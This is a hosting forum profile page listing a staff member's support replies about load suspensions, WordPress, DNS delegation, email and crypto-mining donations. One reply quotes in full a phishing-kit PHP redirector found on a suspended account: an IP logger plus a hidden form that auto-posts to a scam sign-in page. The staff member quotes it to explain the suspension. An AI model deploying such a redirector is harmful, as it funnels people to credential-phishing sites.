-
Posts
18,356 -
Joined
-
Last visited
-
Days Won
705
Everything posted by wolstech
-
Ugh, afraid.org...yeah they're a known incompatibility. Most if not all users who use that service have to go through that hassle of emailing them to make it work correctly with our service (why they can't just let users set NS records is beyond us...). Considering you own the domain mackproductions.com, why not just find another DNS provider? I usually don't recommend it because it can cause its own issues, but Cloudflare supports subdomain delegation, is free, has tons more features than Afraid, and you can configure it just as a DNS service if desired. I tried parking this for you, but the server is too slow at the moment for WHM to work right...
-
[Solved] Tommy account suspensation
wolstech replied to seintitus's topic in Suspended and Queued Accounts
WP never works well on free hosting. Other hosts won't suspend you, but they have fixed limits on resource use instead. On those hosts, WP simply doesn't work right much of the time (usually it'll do things like time out, or run out of memory, or hit an inode limit). Because our aim is to give users flexibility in using the available resources, we don't use a fixed limit like that. Krydos can explain it in detail since he built it, but the basic way our system works is that accounts can use as many resources as needed as long as the server is performing well. However, if the server starts to bogs down, users get suspended starting with the highest load account first. Accounts keep getting suspended until performance recovers. WP just happens to be extremely RAM and CPU hungry, so it's an easy way get an account put near the top of the high load list (and consequently closer to the front of the line for suspension in the event of a load spike or other performance drop).. -
[Solved] Tommy account suspensation
wolstech replied to seintitus's topic in Suspended and Queued Accounts
High WP load as expected. Please remove WP as soon as possible. Unsuspended. -
This is usually mentioned in reference to users wanting more than one of the *.heliohost.us domains, since there is no way to do this on the user's end. However, it also tends to apply when you want to host a single subdomain of a domain that's not hosted here on our server. Please keep in mind that even if we add such a domain, you won't have full functionality unless the domain's current name server supports delegating the subdomain to our name servers (using an A or CNAME is only sufficient if you just need a website, things like email, etc. will have trouble with this configuration), and we often won't/can't provide support for issues related to domains configured using A or CNAME records.
-
Chrome just started flagging your domain as malware, so you're now permanently suspended. Looking at the contents, I agree with it's detection (IP logger and a redirect to what is likely a phishing site that wasn't uploaded yet). It even mentions in the code that it's supposed to be a redirect to a scam site. HelioHost does not condone illegal activity of any type, including phishing or the use of malware or malicious scripts. <?php $url = "https://secure-support.heliohost.us/Page/signin/app/signin"; // URL scam anda (Wajib menggunakan HTTPS) $password = "16shop"; // Password Scam (sesuaikan dengan password di config scam) function getUserIPs() { $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = $_SERVER['REMOTE_ADDR']; if(filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif(filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } $ip = getUserIPs(); ?> <html> <title>Redirecting.....</title> <body onload="document.form.submit()"> <form name="form" id="form" action="<?php echo $url;?>" method="POST"> <div style="display:none;"> <input name="<?php echo md5($ip);?>" value="<?php echo md5($password);?>"> <input type="submit" value="Continue"> </div> </form> </body> </html>
-
It seems like everyone is going that way nowadays. Finding easy-to-mine PoW coins is getting difficult, and even TRTL is talking about an overhaul now that could include staking. PoS coins are worthless from a "free money" standpoint since you can't just poof them up with an extra PC, though to be fair, as an investment they can sometimes work decently.
-
It'll be better off done on your PC. While we are lax about VPS use, I could see mining on one causing server impact. Easiest is to pick a pool and just follow their get started section. Use our wallet address when setting it up. Most miners are just command line apps, and the better ones like xmrig and Stak will do most of the configuration themselves. You just tell it the pool, wallet, and algorithm, it'll figure out the processor and gpu stuff. I've debated resurrecting the Windows miner (which did all the above for you), but the lack of uptake and earnings the first time around makes me feel like I'd be wasting my time. We would come out ahead of heliomine's performance by me just donating $75 and picking up an extra shift at work to earn the money back, and I can do it in 1 day vs. over a year.
-
Your account was suspended for causing high server load. I have unsuspended your account, but please try to limit the load you put on our servers as it slows down not only your site, but the sites of all other HelioHost users sharing your server. <br /><br />If you need help figuring out why your site is causing such high load let us know and we can try to help. If the high load is simply because your site is getting a lot of traffic, you might want to consider purchasing a VPS instead. VPS hosting gives you an entire virtual server to yourself, including no load limits, a dedicated IP address, and full root access.
-
You will eventually get an email about the VPS. When you receive that, you can respond with the donation information if it hasn't already been set up. Krydos will see this post at some point when he checks the forum next, so it's quite possible he'll just set it up.
-
I haven't found a good alternative for browser mining that has decent performance (and doesn't light up every adblocker and antivirus known to man...). Any recommendations? The current recommended crypto mining method is to download your choice of miner and mine directly into our wallets. A list of our addresses can be found at https://heliohost.org/donate/ When the Heliomine miner was around, we primarily mined on the Mine2Gether pools, so using those pools will contribute to the completion of any partial payouts that were never completed TRTL and LOKI are the two best suited for standard PC mining, however XMR is an option if you have a high-end rig or perhaps an extra server laying around.
-
[Solved] How to get a .heliohost.org Subdomain ?
wolstech replied to tedtechm's topic in Customer Service
The free subdomains are .heliohost.us now. You can get one of those by changing your main domain: http://heliohost.org/classic/support/scripts/domain -
Yep, high load again. I've unsuspend you, and will move this topic so Krydos can check on a cause for you
-
Krydos will have to research this further. The only thing I see on your account that could cause this issue is the contents of the ~/public_html/forum folder (forum software can be very memory hungry, even if it sees little to no traffic).
-
[Solved] Trying to get email to work for my custom domain
wolstech replied to jpl2's topic in Customer Service
I just sent a test email from Gmail to jpl [ @ ] imediaearth.com and can confirm that the message was received successfully. -
[Solved] Trying to get email to work for my custom domain
wolstech replied to jpl2's topic in Customer Service
The domain imediaearth.com is stuck in limbo...it's half-added. It shows in the admin tools as being on your account, but not in WHM. It also didn't appear under addons or aliases in the user cPanel, yet had DNS records that Krydos found. Reparking yielded: Park::park failed: (XID shmkf9) A DNS entry for “imediaearth.com” already exists. You must remove this DNS entry from this server or all servers in the DNS cluster to proceed. The domain imediaearth.com has been cleaned up, and re-parked on your Tommy account. Give it an hour or so, and the queued page should go away and mail should start working. -
You won't be able to delete it since it is suspended. It will delete itself in due time. The account's username is bhandra and it's domain was bhandra.tk. I cannot post the entire email address for privacy and spam reasons, but it's an email address that looks like sum****3@****l.com
-
Unsuspended.
-
HelioHost Logo and Banner Recreated in HD
wolstech replied to Flaze's topic in Art and Entertainment
@Kassu: Your post has been split: https://www.helionet.org/index/topic/41562-graphics-design-in-finland/ -
It's because you have two accounts. You're only allowed one. Which one do you want to keep?
-
It's not bandwidth that gets you suspended for this (in fact, we don't even monitor bandwidth, it's unlimited). It's CPU and RAM use on the server that gets you a load suspension. In your case, it was RAM use. You can see here: https://tommy.heliohost.org:2083/frontend/paper_lantern/load/index.live.php The closer you are to 100 on that chart, the more likely you are to be suspended in the event the server starts to bog down. Your account's RAM use was at 100 for 3 of the past 7 days, and near it for 2 of them, so I'm not surprised you got suspended. Krydos can check and give you a process name, but that usually just says it's PHP...we don't really have a way of knowing which file caused the excess load, but looking at your account, the forum is my guess since most of the other folders appear to contain simple HTML files.
-
Your account was suspended because Wordpress is causing too much load. I have unsuspended your account, but please try to limit the load you put on our servers as it slows down not only your site, but the sites of all other HelioHost users sharing your server. This is really common for Wordpress. It can cause massive amounts of load even if you're hardly getting any traffic to your site. Wordpress is also incredibly insecure and very easy to hack. We see Wordpress accounts get hacked all the time and usually the hacker sets up a phishing site on your domain. We strongly recommend using any software other than Wordpress. Something that might help is this simply static Wordpress plugin. It will speed up your site, reduce the load you cause, and reduce your chance of getting hacked. If you try it let us know how it worked out for you. If you insist on using Wordpress you might want to consider purchasing a VPS instead. VPS hosting gives you an entire virtual server to yourself, including no load limits, a dedicated IP address, and full root access. Wordpress sites load relatively slowly on our shared hosting, but they will be much faster on a VPS.
-
There was an internal problem with the database server on Ricky that made it impossible to reuse the username victord, so we had to change the username to restore the account.
-
Krydos will need to unarchive this since it failed:
-
Not surprised by the lack of a response...